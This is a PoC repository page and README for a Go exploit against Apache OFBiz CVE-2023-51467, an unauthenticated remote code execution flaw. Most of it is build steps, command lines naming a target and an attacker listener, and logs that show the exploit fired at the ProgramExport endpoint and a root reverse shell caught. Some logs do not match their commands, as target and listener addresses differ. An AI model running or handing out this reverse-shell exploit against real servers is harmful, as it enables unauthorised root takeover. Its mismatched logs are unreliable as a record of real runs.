CVE-2023-51467 PoC — Apache OFBiz: Pre-authentication Remote Code Execution (RCE) vulnerability

Source

Associated Vulnerability

Description

A go-exploit for Apache OFBiz CVE-2023-51467

Readme

# Go-Exploit for CVE-2023-51467

This repository contains a go-exploit for Apache OFBiz CVE-2023-51467. The implementation contains target verification, a version scanner, and an in-memory Nashorn reverse shell as the payload (requires the Java in use supports Nashorn). The weaponization process is described on the [VulnCheck blog](https://vulncheck.com/blog/ofbiz-cve-2023-51467).

# Compiling

You can use the makefile to build a docker container:

```sh
make docker
```

Or, if you have a Go build environment ready to go, just use `make`:

```sh
albinolobster@mournland:~/cve-2023-51467$ make
gofmt -d -w cve-2023-51467.go 
golangci-lint run --fix cve-2023-51467.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-51467_linux-arm64 cve-2023-51467.go
albinolobster@mournland:~/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -h
An exploit for Apache OFBiz CVE-2023-51467 that can generate a reverse shell or bind shell
```

## Example Usage

### Using Docker

```
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ sudo docker run -it --network=host cve-2023-51467 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```


### Encrypted Nashorn Reverse Shell

```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```

### Unencrypted Reverse Shell

```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270 
time=2024-01-03T16:55:51.232-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:52.595-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:52.948-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:38038"
time=2024-01-03T16:55:52.948-05:00 level=STATUS msg="Active shell from 10.9.49.121:38038"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:58.861-05:00 level=STATUS msg="Exploit exited with an error"
```

File Snapshot

 [4.0K]  /data/pocs/e41f30e1befdb5d2b2b54e1ee85547e21b0ece85
├── [6.7K]  cve-2023-51467.go
├── [ 466]  Dockerfile
├── [ 869]  go.mod
├── [4.7K]  go.sum
├── [ 11K]  LICENSE
├── [2.1K]  Makefile
└── [5.3K]  README.md

0 directories, 7 files

Remarks